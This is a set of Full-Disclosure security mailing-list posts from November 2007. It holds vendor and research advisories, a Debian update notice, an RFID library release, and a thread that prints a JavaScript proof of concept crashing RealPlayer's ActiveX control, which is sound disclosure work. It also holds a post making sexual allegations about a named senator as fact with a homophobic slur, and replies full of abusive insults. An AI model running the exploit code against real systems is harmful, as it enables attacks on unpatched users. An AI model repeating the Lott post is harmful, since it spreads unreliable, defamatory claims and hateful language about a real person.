[Full-disclosure] Announce: RFIDIOt release RFIDIOt-0.1r, November 2007
Folks, I'm please to bring you the latest update to RFIDIOt, the open source python library for RFID exploration... This release is brought to you courtesy of United Airlines, who bumped me from my flight thereby condemning me to 8 hours in the largest, shiniest, emptiest and most soul-destroying lounge I've ever had the misfortune to set foot in... If ever there was motivation to lose yourself in python, this was it... :) From CHANGES: v0.r add SCM Microsystems reader support add -d (debug) option switch to T=1 protocol for PC/SC add auto-detect of PC/SC reader types fix minor reporting issues in readmifaresimple.py fix setting of tag type 'ALL' on ACG readers (different for LF or HF) added a bunch of PCSC ATR card types add reading of previously stored files to mrpkey.py fix CBEFF processing in mrpkey.py fix bruteforcing of first character in mrpkey.py [Petter Bjorklund] add ID Card processing to mrpkey.py [vonJeek mailto:[EMAIL PROTECTED]] The main change is processing the Biometric block in e-passports, which should now work correctly for all nations, and adding ID cards (thanks to vonJeek)... Please let me know if you find any exceptions. ID cards have so far only been tested on NL cards. Full details here: http://rfidiot.org enjoy, Adam -- Adam Laurie Tel: +44 (0) 1304 814800 The Bunker Secure Hosting Ltd. Fax: +44 (0) 1304 814899 Ash Radar Station Marshborough Road Sandwichmailto:[EMAIL PROTECTED] Kent CT13 0PL UNITED KINGDOM PGP key on keyservers ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Trent Lott
Chester Trent Lott Sr. is was a crappy Senator from Mississippi and a member of the Republican Party. He has served in numerous leadership positions, and is best known for gay sex with male prostitutes. On November 26 2007, Lott announced his intent to resign from his Senate seat by the end of 2007, in order to pursue something else in the private sector or to teach. The truth was he left because he was about to be exposed for being a complete faggot IRL [1] Some male whore named Benjamin Nicholas alleged to have been involved with is the married Sen. Trent Lott, who unexpectedly announced his retirement. Lott is well-known to have been against a plethora of gay rights issues throughout his terms in Congress. He was also good friends with Sen. Larry Craig throughout his time in Congress. Nicholas didnt want to go on the record to talk about his dealings with Lott, because, said Nicholas, Trent is going through his fair share of scrutiny right now and I dont want to add to it. However, e-mail and other records confirm that the two have met on at least two occasions. All I can say at this point is no comment, Nicholas. Its the professional thing for me to do. In a subsequent e-mail message, Nicholas confirmed that another publication is working on a story about a possible relationship between Lott and himself, but Nicholas also politely declined an interview for that story. As I said before, Lott has quite a bit on his plate right now and I dont really want to add fuel to the embers, Nicholas explained. HUSTLER MAGAZINE EDiot RESEARCH Hustler publisher Larry Flint posted the following cryptic message on his website:Hustler magazine has received numerous inquiries regarding the involvement of Larry Flynt and Hustler in the resignation of Trent Lott. Senator Lott has been the target of an ongoing Hustler investigation for some time now, due to confidential information that we have received. http://www.encyclopediadramatica.com/Trent_Lott - Be a better pen pal. Text or chat with friends inside Yahoo! Mail. See how.___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2007-0821: Lotus Notes buffer overflow in the Lotus WorkSheet file processor
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Core Security Technologies – CoreLabs Advisory http://www.coresecurity.com/corelabs Lotus Notes buffer overflow in the Lotus WorkSheet file processor *Advisory Information* Title: Lotus Notes buffer overflow in the Lotus WorkSheet file processor Advisory ID: CORE-2007-0821 Advisory URL: http://www.coresecurity.com/index.php5?action=itemid=2008 Date published: 2007-11-27 Date of last update: 2007-11-27 Vendors contacted: IBM Corp. Release mode: COORDINATED RELEASE *Vulnerability Information* Class: Input validation error Remotely Exploitable: Yes Locally Exploitable: Yes Bugtraq ID: N/A CVE Name: N/A *Vulnerability Description* Lotus Notes is the integrated email, calendar, instant messenger, browser and business collaboration application developed by IBM to work as a desktop client in conjunction with IBM’s Lotus Domino server application. The email functionality of Lotus Notes supports previewing and processing file attachments in various formats. To preview and process files in the Lotus Worksheet File format (WKS) used by Lotus 1-2-3 the email client uses a library from a third-party software vendor (Autonomy’s Verity KeyView SDK). Several buffer overflow vulnerabilities were found in the third-party library used by Lotus Notes to process Lotus 1-2-3 file attachments. These vulnerabilities could allow attackers to remotely execute arbitrary commands on vulnerable systems by attaching a specially crafted file that triggers exploitation when unsuspecting users attempt to “View” the attachment. Exploitation of these vulnerabilities requires user intervention. Although these specific vulnerabilities exist on a third–party component the problem is compound by the way Lotus Notes displays information about attachments, making it easier to elicit unsuspecting assistance from the users to exploit them. Lotus Notes displays the file type and corresponding icon based on the attached file’s extension rather than the MIME Content-Type header in the email whereas the view functionality is handled by the Verity KeyView component which processes the attachment based on the file contents. Exploitation of these vulnerabilities requires end-user interaction but the discrepancy described above could allow an attacker to send a malicious Lotus 1-2-3 file as an attachment with a seemingly innocuous extension (for example, .JPG or .GIF) that more easily lure users into viewing it thus making it easier to succeed in the exploitation attempt. These vulnerabilities have been discovered and tested using Lotus Notes and the Verity KeyView SDK components it uses but other applications that use the Verity KeyView SDK may be also vulnerable. *Vulnerable packages* - Lotus Notes version 7.x - Lotus Notes version 8.x (not confirmed by Core) - Lotus Notes version 6.5.6 (not confirmed by Core) - Other software packages using Verity KeyView SDK using vulnerable versions of l123sr.dll *Non-vulnerable packages* N/A *Solution/Vendor Information/Workaround* Lotus Notes customers should follow the instructions of the following support Technote, which outlines the available options based on specific versions of Lotus Notes: http://www.ibm.com/support/docview.wss?rs=475uid=swg21285600 Workaround 1: Delete the keyview.ini file in the Notes program directory. This disables ALL viewers. When a user clicks View (for any file), a dialog box will display with the message Unable to locate the viewer configuration file.. Workaround 2: Delete the problem file l123sr.dll file. When a user tries to view the specific file type, a dialog box will display with the message The viewer display window could not be initialized. All other file types work without returning the error message. Workaround 3: Comment out specific lines in keyview.ini for any references to the problem file (l123sr.dll). To comment a line, you precede it with a semi-colon (;). When a user tries to view the specific file type, a dialog box will display with the message The viewer display window could not be initialized. For example: [KVWKBVE] ;81.2.0.5.0=l123sr.dll ;81.2.0.9.0=l123sr.dll Workaround 4: Filter inbound emails with attachments with potentially malicious files. Lotus 1-2-3 files are usually associated to MIME Content-Type headers set to the following strings: application/lotus-1-2-3 application/lotus123 application/x-lotus123 application/wks application/x-wks application/vnd.lotus-1-2-3 Note however that workaround #4 is a simply stop gap measure that could be circumvented by relatively unsophisticated attackers. *Credits* This vulnerability was discovered by Sebastián Muñiz from the CORE IMPACT Exploit Writers Team (EWT) *Technical Description* Lotus 1-2-3 and Lotus Symphony spreadsheet applications use the Worksheet File format [1] to persist spreadsheet data on the file system. Lotus Notes uses a third-party library [2] to process file attachments in the Lotus Worksheet
Re: [Full-disclosure] UPDATED: RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows
Ouch is right.. I know I confused alot of people, I apologize for that. Anyhow, SecurityFocus moved the PlayerProperty() issue from 22811 to its own BID, http://www.securityfocus.com/bid/26586. I have been in contact with Symantec's DeepSight team, and it looks like the Import() function will still throw a stack overflow exception, however it does not appear to overwrite the EIP, making it a plain old DoS attack. I believe they plan to post a write-up on this.Elazar-Original Message- From: James Matthews <[EMAIL PROTECTED]> Sent: Nov 26, 2007 7:24 PM To: Elazar Broad <[EMAIL PROTECTED]> Cc: "full-disclosure@lists.grok.org.uk"Subject: Re: [Full-disclosure] UPDATED: RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows Ouch! On Nov 26, 2007 9:15 PM, Elazar Broad [EMAIL PROTECTED] wrote: After some creative Googling, I am revising my original post. I believe that the Import() method overflow that I originally posted is really http://www.securityfocus.com/bid/26130 , although I am not sure why Linux is listed under the "Vulnerable" section, so I am taking it out of the PoC code. Real claims to have patched this back in October, but I can still throw a stack overflow exception via this function using the originally stated version of RealPlayer(which I installed last night). I am now listing this vulnerability as RealNetworks RealPlayer ierpplug.dll ActiveX Control PlayerProperty() Method Stack Overflow, and it might be wise to list this under a separate BID. PoC as follows:-!--written by e.b.--html head script language="_javascript_" DEFER function Check() { var s = ""; while (s.length 99) s=s+s; var obj = new ActiveXObject(" IERPCTL.IERPCTL"); //{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5} var obj2 = obj.PlayerProperty(s); } /script/headbody /body/html-Elazar___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/-- http://www.goldwatches.com/coupons/http://www.jewelerslounge.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] UPDATED: RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows
Holy mother of Hitler will you shut the fuck up already. This is a stack overflow not a stack based buffer overflow. There are no security implications here. You are worse than Jewha Mati Laurio. Elazar, please do not post to this list again. Please leave the trolling to the professionals. J P.S. Sorry for the swear words John. On Wed, 31 Dec 1969 19:00:00 -0500 Elazar Broad [EMAIL PROTECTED] wrote: After some creative Googling, I am revising my original post. I believe that the Import() method overflow that I originally posted is really http://www.securityfocus.com/bid/26130, although I am not sure why Linux is listed under the Vulnerable section, so I am taking it out of the PoC code. Real claims to have patched this back in October, but I can still throw a stack overflow exception via this function using the originally stated version of RealPlayer(which I installed last night). I am now listing this vulnerability as RealNetworks RealPlayer ierpplug.dll ActiveX Control PlayerProperty() Method Stack Overflow, and it might be wise to list this under a separate BID. PoC as follows: - !-- written by e.b. -- html head script language=JavaScript DEFER function Check() { var s = ; while (s.length 99) s=s+s; var obj = new ActiveXObject(IERPCTL.IERPCTL); //{FDC7A535- 4070-4B92-A0EA-D9994BCC0DC5} var obj2 = obj.PlayerProperty(s); } /script /head body onload=JavaScript: return Check(); /body /html - Elazar ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Become a medical transcriptionist at home, at your own pace. http://tagline.hushmail.com/fc/Ioyw6h4eKoY5QPbl6HF48RpgEtzySCfsQ404uXiPJLBOn00vA9ZmnG/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] UPDATED: RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows
LOLOLOLOL ok you win, client side denial of service warrants your 5 electronic mail messages with up to the minute updates. I bet this one will be exploited in the wild! Get a life LOLOL! J On Wed, 31 Dec 1969 19:00:00 -0500 Elazar Broad [EMAIL PROTECTED] wrote: Stack Overflow - learn to read. A DoS attack still has some security implications... -Original Message- From: Joey Mengele [EMAIL PROTECTED] Sent: Nov 27, 2007 1:05 AM To: full-disclosure@lists.grok.org.uk, [EMAIL PROTECTED] Subject: Re: [Full-disclosure] UPDATED: RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows Holy mother of Hitler will you shut the fuck up already. This is a stack overflow not a stack based buffer overflow. There are no security implications here. You are worse than Jewha Mati Laurio. Elazar, please do not post to this list again. Please leave the trolling to the professionals. J P.S. Sorry for the swear words John. On Wed, 31 Dec 1969 19:00:00 -0500 Elazar Broad [EMAIL PROTECTED] wrote: After some creative Googling, I am revising my original post. I believe that the Import() method overflow that I originally posted is really http://www.securityfocus.com/bid/26130, although I am not sure why Linux is listed under the Vulnerable section, so I am taking it out of the PoC code. Real claims to have patched this back in October, but I can still throw a stack overflow exception via this function using the originally stated version of RealPlayer(which I installed last night). I am now listing this vulnerability as RealNetworks RealPlayer ierpplug.dll ActiveX Control PlayerProperty() Method Stack Overflow, and it might be wise to list this under a separate BID. PoC as follows: - !-- written by e.b. -- html head script language=JavaScript DEFER function Check() { var s = ; while (s.length 99) s=s+s; var obj = new ActiveXObject(IERPCTL.IERPCTL); //{FDC7A535- 4070-4B92-A0EA-D9994BCC0DC5} var obj2 = obj.PlayerProperty(s); } /script /head body onload=JavaScript: return Check(); /body /html - Elazar ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Click for your daily horoscope, learn about money, love family. http://tagline.hushmail.com/fc/Ioyw6h4c4ZBHl2sHpyjNjTLgy4OTny6jhrF rqMryjXVt31vg2H7tNd/ -- Click for your daily horoscope, learn about money, love family. http://tagline.hushmail.com/fc/Ioyw6h4c4ZARVCeSZnQsflA3BGgTQlm8TvOc2Qh6Kh1tD32a9sgsa8/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Eee PC Security
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Danny wrote: Has anyone had a go with/against the Asus Eee PC? Yes. Open the file browser and get a terminal (/usr/bin/konsole will do). Then just 'sudo su -' and you're root! Every user gets ALL=(ALL) NOPASSWD: ALL in sudoers, so not much of a challenge. Haven't tried any remote exploits, but was running a (probably customised) 2.6.16 kernel (iirc) so is vulnerable to a couple of things off the top of my head. Matt -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org iD8DBQFHTEyXw5xT5S6r89URAi7UAJsE7/ZIw4AiPMtwoyFFp+Pv05rS5wCghT+J Gi7KBFmBiQo4aY4ehF9BcsE= =biMR -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 1416-1] New tk8.3 packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1416-1 [EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff November 27, 2007 http://www.debian.org/security/faq - Package: tk8.3 Vulnerability : buffer overflow Problem type : local(remote) Debian-specific: no CVE Id(s) : CVE-2007-5378 It was discovered that Tk, a cross-platform graphical toolkit for Tcl performs insufficient input validation in the code used to load GIF images, which may lead to the execution of arbitrary code. For the stable distribution (etch), this problem has been fixed in version 8.3.5-6etch1. Due to the technical limitation in the Debian archive scripts the update for the old stable distribution (sarge) cannot be released in sync with the update for the stable distribution. It will be provided in the next days. We recommend that you upgrade your tk8.3 packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian (stable) - --- Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3_8.3.5-6etch1.dsc Size/MD5 checksum: 672 de719ed8329448b60a2aa5222d94b4c5 http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3_8.3.5-6etch1.diff.gz Size/MD5 checksum:28583 de9d57ab9820f98f01a71cab78b9a51c http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3_8.3.5.orig.tar.gz Size/MD5 checksum: 2598030 363a55d31d94e05159e9212074c68004 Architecture independent packages: http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3-doc_8.3.5-6etch1_all.deb Size/MD5 checksum: 656798 11b87b5e83e8adfa2e19dc93567c422f alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3-dev_8.3.5-6etch1_alpha.deb Size/MD5 checksum: 808264 05534d541c67856fd7df57bee0b7448f http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3_8.3.5-6etch1_alpha.deb Size/MD5 checksum: 870224 c8f3c39de9dbdbe34afc0558653e97f2 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3-dev_8.3.5-6etch1_amd64.deb Size/MD5 checksum: 691340 3aa055a50b0c1864712cad543240cab6 http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3_8.3.5-6etch1_amd64.deb Size/MD5 checksum: 830790 50c07325658b74d25d06e239012da590 arm architecture (ARM) http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3-dev_8.3.5-6etch1_arm.deb Size/MD5 checksum: 649782 33621a77aaf49894dc7962d7579ae2c3 http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3_8.3.5-6etch1_arm.deb Size/MD5 checksum: 802848 7619e44e0c07804307f3b3d59d97589a hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3_8.3.5-6etch1_hppa.deb Size/MD5 checksum: 888990 d9eaf0227c0594236389bf877747744e http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3-dev_8.3.5-6etch1_hppa.deb Size/MD5 checksum: 773376 c06fc4983e04a409811c6b070a7d0b4a i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3-dev_8.3.5-6etch1_i386.deb Size/MD5 checksum: 670426 3bf93bae2527f043b01edb3018de4d90 http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3_8.3.5-6etch1_i386.deb Size/MD5 checksum: 803736 99d6c8562e60a2648817db63555fcbc1 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3_8.3.5-6etch1_ia64.deb Size/MD5 checksum: 1057842 45e3159db424788b401d4a98c1dfb511 http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3-dev_8.3.5-6etch1_ia64.deb Size/MD5 checksum: 959436 9cce282e61e257655301ad47ddc03ac1 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3_8.3.5-6etch1_mips.deb Size/MD5 checksum: 824708 437a50b7cfd05d863b9a4a97b596969e http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3-dev_8.3.5-6etch1_mips.deb Size/MD5 checksum: 725262 8a50f4b098e50fec648ce187139f8af8 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/t/tk8.3/tk8.3_8.3.5-6etch1_mipsel.deb Size/MD5 checksum: 822976 3451e740c116b8fbf77c07e744624637
[Full-disclosure] [SECURITY] [DSA 1415-1] New tk8.4 packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1415-1 [EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff November 27, 2007 http://www.debian.org/security/faq - Package: tk8.4 Vulnerability : buffer overflow Problem type : local(remote) Debian-specific: no CVE Id(s) : CVE-2007-5378 It was discovered that Tk, a cross-platform graphical toolkit for Tcl performs insufficient input validation in the code used to load GIF images, which may lead to the execution of arbitrary code. For the stable distribution (etch), this problem has been fixed in version 8.4.12-1etch1. For the old stable distribution (sarge), this problem has been fixed in version 8.4.9-1sarge1. We recommend that you upgrade your tk8.4 packages. Updated packages for sparc will be provided later. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian 3.1 (oldstable) - -- Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4_8.4.9-1sarge1.diff.gz Size/MD5 checksum:19132 8ded0a058cbe9140f905cbd769622d45 http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4_8.4.9.orig.tar.gz Size/MD5 checksum: 3266500 1b64258abaf258e9a86f331d8de17a71 http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4_8.4.9-1sarge1.dsc Size/MD5 checksum: 672 3a7de8981a9239e231c55486ee308de3 Architecture independent packages: http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4-doc_8.4.9-1sarge1_all.deb Size/MD5 checksum: 775182 df1628c1fadebdf2ce7d4ab138a0dcca alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4-dev_8.4.9-1sarge1_alpha.deb Size/MD5 checksum: 940380 984e7d1787ea4bf5df7d05be8feaee31 http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4_8.4.9-1sarge1_alpha.deb Size/MD5 checksum: 1031394 a68b8bd438ce30ad2899e893abbdf042 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4_8.4.9-1sarge1_amd64.deb Size/MD5 checksum: 976380 299c8fca87bdbe6a162edea32d44c38d http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4-dev_8.4.9-1sarge1_amd64.deb Size/MD5 checksum: 810012 3b83261ac52a6a630958969f8b68f044 arm architecture (ARM) http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4_8.4.9-1sarge1_arm.deb Size/MD5 checksum: 945218 6f016ddd99884ffb1a7fa636d5c157fd http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4-dev_8.4.9-1sarge1_arm.deb Size/MD5 checksum: 823888 2c55586df75b8ce85b71f396aa511ce9 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4-dev_8.4.9-1sarge1_hppa.deb Size/MD5 checksum: 912732 100772a425baf8736ac2e59e11a111e4 http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4_8.4.9-1sarge1_hppa.deb Size/MD5 checksum: 1046506 ac02d6ea5b9249cfc8d8bd3f7905dd03 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4_8.4.9-1sarge1_i386.deb Size/MD5 checksum: 956128 8508b0b84a8a8887903ee61096c85c39 http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4-dev_8.4.9-1sarge1_i386.deb Size/MD5 checksum: 793304 9bc383580f29575f49035ec640595df4 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4-dev_8.4.9-1sarge1_ia64.deb Size/MD5 checksum: 1053280 c1684368d5bbdc14919cb11ad26bc726 http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4_8.4.9-1sarge1_ia64.deb Size/MD5 checksum: 1182358 2a0c99c93455876bf42867bc83620b00 m68k architecture (Motorola Mc680x0) http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4_8.4.9-1sarge1_m68k.deb Size/MD5 checksum: 909088 ccece33fe08dc605e03044dad3a43661 http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4-dev_8.4.9-1sarge1_m68k.deb Size/MD5 checksum: 696326 0ab235f58988c18975e43089c3e10af0 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4-dev_8.4.9-1sarge1_mips.deb Size/MD5 checksum: 836414 48299e087ae5dc67625b27d7f0854e32 http://security.debian.org/pool/updates/main/t/tk8.4/tk8.4_8.4.9-1sarge1_mips.deb Size/MD5 checksum: 974766
Re: [Full-disclosure] Eee PC Security
Has anyone had a go with/against the Asus Eee PC? SANS did a write-up on this the other day : http://isc.sans.org/diary.html?storyid=3687 .. and they include the steps required to disable the offending services. ~Mike. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Security Contact @ Avast!
Hi Could anyone send me the security contact of avast! ? [EMAIL PROTECTED] does not response. Thanks -- Sowhat http://secway.org Life is like a bug, Do you know how to exploit it ? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ZDI-07-069: CA BrightStor ARCserve Backup Message Engine Insecure Method Expos
it is so amazing that the vendor's advisory has been released more than one month ago, (see my advisory of a similar vul at http://ruder.cdut.net/blogview.asp?logID=221), and another thing is that I have tested my reported vul again after CA's patch released one month ago, but in fact they have not fixed it!! I report it again to CA but there is no response, I guess CA is making an international joke with us:), or because this product is so bad that they will not support it any more? welcome to my blog:http://ruder.cdut.net From: [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED] Date: Mon, 26 Nov 2007 16:10:30 -0600 Subject: [Full-disclosure] ZDI-07-069: CA BrightStor ARCserve Backup Message Engine Insecure Method Exposure Vulnerability ZDI-07-069: CA BrightStor ARCserve Backup Message Engine Insecure Method Exposure Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-07-069.html November 26, 2007 -- CVE ID: CVE-2007-5328 -- Affected Vendor: Computer Associates -- Affected Products: BrightStor ARCserve Backup r11.5 BrightStor ARCserve Backup r11.1 BrightStor ARCserve Backup r11.0 BrightStor Enterprise Backup r10.5 BrightStor ARCserve Backup v9.01 -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 5144. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerabil ity Details: This vulnerability allows attackers to arbitrarily access and modify the file system and registry of vulnerable installations of Computer Associates BrightStor ARCserve Backup. Authentication is not required to exploit this vulnerability. The specific flaws exists in the Message Engine RPC service which listens by default on TCP port 6504 with the following UUID: 506b1890-14c8-11d1-bbc3-00805fa6962e The service exposes a number of insecure method calls including: 0x17F, 0x180, 0x181, 0x182, 0x183, 0x184, 0x185, 0x186, 0x187, 0x188, 0x189, 0x18A, 0x18B, and 0x18C. Attackers can leverage these methods to manipulate both the file system and registry which can result in a complete system compromise. -- Vendor Response: Computer Associates has issued an update to correct this vulnerability. More details can be found at: http://supportconnectw.ca.com/public/storage/infodocs/basb-secnotice.asp -- Disclosure Timeline: 2007.01.12 - Vulnerabi lity reported to vendor 2007.11.26 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by Tenable Network Security. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly av ailable. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ _ 用 Live Search 搜尽天下资讯! http://www.live.com/?searchOnly=true___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability
Microsoft FTP Client Multiple Bufferoverflow Vulnerability # XDisclose Advisory : XD100096 Vulnerability Discovered: November 20th 2007 Advisory Reported : November 28th 2007 Credit : Rajesh Sethumadhavan Class : Buffer Overflow Denial Of Service Solution Status : Unpatched Vendor : Microsoft Corporation Affected applications : Microsoft FTP Client Affected Platform : Windows 2000 server Windows 2000 Professional Windows XP (Other Versions may be also effected) # Overview: Bufferoverflow vulnerability is discovered in microsoft ftp client. Attackers can crash the ftp client of the victim user by tricking the user. Description: A remote attacker can craft packet with payload in the mget, ls, dir, username and password commands as demonstrated below. When victim execute POC or specially crafted packets, ftp client will crash possible arbitrary code execution in contest of logged in user. This vulnerability is hard to exploit since it requires social engineering and shellcode has to be injected as argument in vulnerable commands. The vulnerability is caused due to an error in the Windows FTP client in validating commands like mget, dir, user, password and ls Exploitation method: Method 1: -Send POC with payload to user. -Social engineer victim to open it. Method 2: -Attacker creates a directory with long folder or filename in his FTP server (should be other than IIS server) -Persuade victim to run the command mget, ls or dir on specially crafted folder using microsoft ftp client -FTP client will crash and payload will get executed Proof Of Concept: http://www.xdisclose.com/poc/mget.bat.txt http://www.xdisclose.com/poc/username.bat.txt http://www.xdisclose.com/poc/directory.bat.txt http://www.xdisclose.com/poc/list.bat.txt Note: Modify POC to connect to lab FTP Server (As of now it will connect to ftp://xdisclose.com) Demonstration: Note: Demonstration leads to crashing of Microsoft FTP Client Download POC rename to .bat file and execute anyone of the batch file http://www.xdisclose.com/poc/mget.bat.txt http://www.xdisclose.com/poc/username.bat.txt http://www.xdisclose.com/poc/directory.bat.txt http://www.xdisclose.com/poc/list.bat.txt Solution: No Solution Screenshot: http://www.xdisclose.com/images/msftpbof.jpg Impact: Successful exploitation may allows execution of arbitrary code with privilege of currently logged in user. Impact of the vulnerability is system level. Original Advisory: http://www.xdisclose.com/advisory/XD100096.html Credits: Rajesh Sethumadhavan has been credited with the discovery of this vulnerability Disclaimer: This entire document is strictly for educational, testing and demonstrating purpose only. Modification use and/or publishing this information is entirely on your own risk. The exploit code/Proof Of Concept is to be used on test environment only. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. Never miss a thing. Make Yahoo your home page. http://www.yahoo.com/r/hs ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/